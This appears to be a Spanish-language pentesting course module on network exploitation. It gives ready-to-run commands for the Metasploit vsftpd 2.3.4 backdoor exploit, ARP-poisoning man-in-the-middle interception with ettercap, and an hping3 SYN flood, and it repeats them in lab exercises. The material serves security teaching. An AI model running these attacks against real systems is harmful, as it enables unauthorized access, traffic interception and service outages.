Introducción
La explotación de vulnerabilidades de red es una fase crítica en el proceso de pentesting. En esta etapa, los pentesters buscan y explotan debilidades en la infraestructura de red para obtener acceso no autorizado, interrumpir servicios o exfiltrar datos. Este módulo cubre las técnicas y herramientas utilizadas para explotar vulnerabilidades de red.
Conceptos Clave
- Vulnerabilidades de Red: Fallos en la configuración, implementación o diseño de los componentes de red que pueden ser explotados.
- Explotación de Servicios: Ataques dirigidos a servicios específicos que se ejecutan en la red.
- Ataques de Intercepción: Técnicas para interceptar y manipular el tráfico de red.
- Ataques de Denegación de Servicio (DoS): Métodos para interrumpir la disponibilidad de servicios de red.
Técnicas de Explotación de Red
- Explotación de Servicios
Ejemplo: Explotación de un Servicio FTP Vulnerable
Descripción: Un servicio FTP mal configurado puede permitir acceso no autorizado o la ejecución de comandos arbitrarios.
Herramienta: Metasploit Framework
Paso a Paso:
-
Identificación del Servicio:
nmap -sV -p 21 <target_ip>
Este comando escanea el puerto 21 para identificar el servicio FTP y su versión.
-
Búsqueda de Exploits:
searchsploit vsftpd 2.3.4
Busca exploits conocidos para la versión del servicio FTP identificado.
-
Carga del Exploit en Metasploit:
msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOST <target_ip> set RPORT 21 exploit
Este exploit aprovecha una puerta trasera en vsftpd 2.3.4 para obtener acceso a la shell.
- Ataques de Intercepción
Ejemplo: Ataque Man-in-the-Middle (MitM)
Descripción: Un atacante intercepta y manipula el tráfico entre dos partes sin que estas lo sepan.
Herramienta: Ettercap
Paso a Paso:
-
Habilitar el Envenenamiento ARP:
echo 1 > /proc/sys/net/ipv4/ip_forward ettercap -T -q -i <network_interface> -M arp:remote /<target_ip>/ /<gateway_ip>/
Este comando configura Ettercap para interceptar el tráfico entre el objetivo y el gateway.
-
Captura de Tráfico:
ettercap -T -q -i <network_interface> -M arp:remote /<target_ip>/ /<gateway_ip>/ -w capture.pcap
Guarda el tráfico interceptado en un archivo para su análisis posterior.
- Ataques de Denegación de Servicio (DoS)
Ejemplo: Ataque SYN Flood
Descripción: Un atacante envía una gran cantidad de solicitudes SYN para agotar los recursos del servidor y hacer que el servicio no esté disponible.
Herramienta: hping3
Paso a Paso:
- Ejecutar el Ataque:
Este comando envía un flujo continuo de paquetes SYN al puerto 80 del objetivo.hping3 -S --flood -V -p 80 <target_ip>
Ejercicios Prácticos
Ejercicio 1: Explotación de un Servicio FTP Vulnerable
Objetivo: Explorar y explotar un servicio FTP vulnerable utilizando Metasploit.
Instrucciones:
- Identifica un servicio FTP en tu red de laboratorio.
- Utiliza
nmap
para identificar la versión del servicio. - Busca exploits disponibles para esa versión.
- Carga y ejecuta el exploit en Metasploit.
Solución:
- Escanea el servicio FTP:
nmap -sV -p 21 192.168.1.10
- Busca exploits:
searchsploit vsftpd 2.3.4
- Carga y ejecuta el exploit:
msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set RHOST 192.168.1.10 set RPORT 21 exploit
Ejercicio 2: Realizar un Ataque Man-in-the-Middle
Objetivo: Configurar y ejecutar un ataque MitM utilizando Ettercap.
Instrucciones:
- Habilita el envenenamiento ARP.
- Configura Ettercap para interceptar el tráfico entre un objetivo y el gateway.
- Captura el tráfico para su análisis.
Solución:
- Habilita el envenenamiento ARP:
echo 1 > /proc/sys/net/ipv4/ip_forward ettercap -T -q -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/
- Captura el tráfico:
ettercap -T -q -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -w capture.pcap
Retroalimentación y Consejos
-
Errores Comunes:
- No verificar la versión del servicio antes de intentar un exploit.
- No habilitar el reenvío de IP antes de ejecutar un ataque MitM.
- No monitorear el impacto de un ataque DoS en la red.
-
Consejos Adicionales:
- Siempre realiza pruebas en un entorno controlado y con permisos adecuados.
- Documenta cada paso y resultado para facilitar la creación de informes.
- Mantente actualizado con las últimas vulnerabilidades y exploits.
Conclusión
En este módulo, hemos explorado diversas técnicas para la explotación de vulnerabilidades de red, incluyendo la explotación de servicios, ataques de intercepción y ataques de denegación de servicio. Estas técnicas son fundamentales para evaluar la seguridad de una red y deben ser utilizadas de manera ética y legal. En el próximo módulo, nos centraremos en la post-explotación, donde aprenderemos a escalar privilegios, mantener el acceso y cubrir nuestras huellas.
Curso de Pentesting: Técnicas de Pruebas de Penetración
Módulo 1: Introducción al Pentesting
Módulo 2: Reconocimiento y Recolección de Información
Módulo 3: Escaneo y Enumeración
Módulo 4: Explotación de Vulnerabilidades
- Introducción a la Explotación
- Explotación de Vulnerabilidades Web
- Explotación de Vulnerabilidades de Red
- Explotación de Vulnerabilidades de Sistemas